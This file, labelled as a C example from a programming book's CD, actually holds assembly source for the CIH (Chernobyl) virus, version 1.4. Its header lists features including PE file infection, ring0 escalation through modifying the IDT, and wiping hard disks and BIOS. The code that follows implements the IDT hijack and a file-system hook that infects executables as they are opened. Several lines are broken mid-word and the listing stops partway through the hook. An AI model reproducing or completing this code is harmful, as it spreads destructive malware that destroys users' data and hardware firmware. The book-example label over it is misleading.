046.c

C语言实战105例的光盘所附程序

*********************************************************

; * The Virus Program Information * 

; ******************************************************* 

; * * 
; * Designer : CIH Source : TTIT of TATUNG in Taiwan * 
; * Create Date : 04/26/1998 Now Version : 1.4 * 
; * Modification Time : 05/31/1998 * 
; * * 
; * Turbo Assembler Version 4.0 : tasm /m cih * 
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * 
; * * 
; *=========================================================* 
; * Modification History * 
; *=========================================================* 
; * v1.0 1. Create the Virus Program. * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * 
; * 04/26/1998 3. Virus Code doesn't Reload into System. * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * 
; * 6. When System Opens Existing PE File, the File will be * 
; * Infected, and the File doesn't be Reinfected. * 
; * 7. It is also Infected, even the File is Read-Only. * 
; * 8. When the File is Infected, the Modification Date and Time * 
; * of the File also don't be Changed. * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * 
; * Previous FileSystemApiHook, it will Call the Function * 
; * that the IFS Manager Would Normally Call to Implement * 
; * this Particular I/O Request. * 
; * 10. The Virus Size is only 656 Bytes. * 
; *============================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase * 
; * it's Size... ^__^ * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * 
; * When Exception Error Occurs, Our OS System should be in * 
; * Windows NT. So My Cute Virus will not Continue to Run, * 
; * it will Jmup to Original Application to Run. * 
; * 3. Use Better Algorithm, Reduce Virus Code Size. * 
; * 4. The Virus "Basic" Size is only 796 Bytes. * 
; *=============================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * 
; * 2. Modify the Bug of v1.1 * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * 
; *============================================================* 
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * 
; * So When Open WinZip Self-Extractor ==> Don't Infect it. * 
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * 
; *=============================================================* 
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * 
; * 2. Change the Date of Killing Computers. * 
; * 05/31/1998 3. Modify Virus Version Copyright. * 
; * 4. The Virus "Basic" Size is 1019 Bytes. * 
; ************************************************************* 

.586P 

; ************************************************************* 
; * Original PE Executable File(Don't Modify this Section) * 
; ************************************************************ 

OriginalAppEXE SEGMENT 

FileHeader: 
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
dd 00000000h, VirusSize 

lea ecx, StopToRunVirusCode-@0[ebx] 
push ecx 

push eax 

; ************************************* 
; * Let's Modify * 
; * IDT(Interrupt Descriptor Table) * 
; * to Get Ring0 Privilege... * 
; ************************************* 

push eax ; 
sidt [esp-02h] ; Get IDT Base Address 
pop ebx ; 

add ebx, HookExceptionNumber*08h+04h ; ZF = 0 

cli 

mov ebp, [ebx] ; Get Exception Base 
mov bp, [ebx-04h] ; Entry Point 

lea esi, MyExceptionHook-@1[ecx] 

push esi 

mov [ebx-04h], si ; 
shr esi, 16 ; Modify Exception 
mov [ebx+02h], si ; Entry Point Address 

pop esi 

; ************************************* 
; * Generate Exception to Get Ring0 * 
; ************************************* 

int HookExceptionNumber ; GenerateException 
ReturnAddressOfEndException = $ 

; ************************************* 
; * Merge All Virus Code Section * 
; ************************************* 

; ************************************* 
; * Generate Exception Again * 
; ************************************* 

int HookExceptionNumber ; GenerateException Aga 


; ************************************* 
; * Let's Restore * 
; * Structured Exception Handing * 
; ************************************* 

ReadyRestoreSE: 
sti 

xor ebx, ebx 

jmp RestoreSE 

; ************************************* 
; * When Exception Error Occurs, * 
; * Our OS System should be in NT. * 
; * So My Cute Virus will not * 
; * Continue to Run, it Jmups to * 
; * Original Application to Run. * 
; ************************************* 

StopToRunVirusCode: 
@1 = StopToRunVirusCode 

xor ebx, ebx 
mov eax, fs:[ebx] 
mov esp, [eax] 

RestoreSE: 
pop dword ptr fs:[ebx] 
pop eax 

; ************************************* 
; * Return Original App to Execute * 
; ************************************* 

pop ebp 

push 00401000h ; Push Original 
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack 

ret ; Return to Original App Entry Point 

; ********************************************************* 
; * Ring0 Virus Game Initial Program * 
; ********************************************************* 

MyExceptionHook: 
@2 = MyExceptionHook 

jz InstallMyFileSystemApiHook 

; ************************************* 
; * Do My Virus Exist in System !? * 
; ************************************* 

mov ecx, dr0 
jecxz AllocateSystemMemoryPage 

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf 
dException 

; ************************************* 
; * Return to Ring3 Initial Program * 
; ************************************* 

ExitRing0Init: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Restore Exception 
mov [ebx+02h], bp ; 

iretd 

; ************************************* 
; * Allocate SystemMemory Page to Use * 
; ************************************* 

AllocateSystemMemoryPage: 

mov dr0, ebx ; Set the Mark of My Virus Exis 
in System 

push 00000000fh ; 
push ecx ; 
push 0ffffffffh ; 
push ecx ; 
push ecx ; 
push ecx ; 
push 000000001h ; 
push 000000002h ; 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate = $ ; 
dd 00010053h ; Use EAX, ECX, EDX, and flags 
add esp, 08h*04h 

xchg edi, eax ; EDI = SystemMemory Start Addr 
s 

lea eax, MyVirusStart-@2[esi] 

iretd ; Return to Ring3 Initial Program 

; ************************************* 
; * Install My File System Api Hook * 
; ************************************* 

InstallMyFileSystemApiHook: 

lea eax, FileSystemApiHook-@6[edi] 

push eax ; 
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
IFSMgr_InstallFileSystemApiHook = $ ; 
dd 00400067h ; Use EAX, ECX, EDX, and flags 

mov dr0, eax ; Save OldFileSystemApiHook Add 
ss 

pop eax ; EAX = FileSystemApiHook Address 

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point 
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
mov edx, [ecx] 
mov OldInstallFileSystemApiHook-@3[eax], edx 

; Modify IFSMgr_InstallFileSystemApiHook Entry Point 
lea eax, InstallFileSystemApiHook-@3[eax] 
mov [ecx], eax 

cli 

jmp ExitRing0Init 

; ********************************************************* 
; * Code Size of Merge Virus Code Section * 
; ********************************************************* 

CodeSizeOfMergeVirusCodeSection = offset $ 

; ********************************************************* 
; * IFSMgr_InstallFileSystemApiHook * 
; ********************************************************* 

InstallFileSystemApiHook: 
push ebx 

call @4 ; 
@4: ; 
pop ebx ; mov ebx, offset FileSystemApiHook 
add ebx, FileSystemApiHook-@4 ; 

push ebx 
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
IFSMgr_RemoveFileSystemApiHook = $ 
dd 00400068h ; Use EAX, ECX, EDX, and flags 
pop eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link Client FileSystemApiHook 
push dword ptr [esp+8] 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

push eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link My FileSystemApiHook 
push ebx 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

mov dr0, eax ; Adjust OldFileSystemApiHook A 
ress 

pop eax 

pop ebx 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

OldInstallFileSystemApiHook dd ? 

; ********************************************************* 
; * IFSMgr_FileSystemHook * 
; ********************************************************* 

; ************************************* 
; * IFSMgr_FileSystemHook Entry Point * 
; ************************************* 

FileSystemApiHook: 
@3 = FileSystemApiHook 

pushad 

call @5 ; 
@5: ; 
pop esi ; mov esi, offset VirusGameDataStartAdd 
ss 
add esi, VirusGameDataStartAddress-@5 

; ************************************* 
; * Is OnBusy !? * 
; ************************************* 

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) 
jnz pIFSFunc ; goto pIFSFunc 

; ************************************* 
; * Is OpenFile !? * 
; ************************************* 

; if ( NotOpenFile ) 
; goto prevhook 
lea ebx, [esp+20h+04h+04h] 
cmp dword ptr [ebx], 00000024h 
jne prevhook 

; ************************************* 
; * Enable OnBusy * 
; ************************************* 

inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy 

; ************************************* 
; * Get FilePath's DriveNumber, * 
; * then Set the DriveName to * 
; * FileNameBuffer. * 
; ************************************* 
; * Ex. If DriveNumber is 03h, * 
; * DriveName is 'C:'. * 
; ************************************* 

; mov esi, offset FileNameBuffer 
add esi, FileNameBuffer-@6 

push esi 

mov al, [ebx+04h] 
cmp al, 0ffh 
je CallUniToBCSPath 

add al, 40h 
mov ah, ':' 

mov [esi], eax 

inc esi 
inc esi 

; ************************************* 
; * UniToBCSPath * 
; ************************************* 
; * This Service Converts * 
; * a Canonicalized Unicode Pathname * 
; * to a Normal Pathname in the * 
; * Specified BCS Character Set. * 
; ************************************* 

CallUniToBCSPath: 
push 00000000h 
push FileNameBufferSize 
mov ebx, [ebx+10h] 
mov eax, [ebx+0ch] 
add eax, 04h 
push eax 
push esi 
int 20h ; VXDCall UniToBCSPath 
UniToBCSPath = $ 
dd 00400041h 
add esp, 04h*04h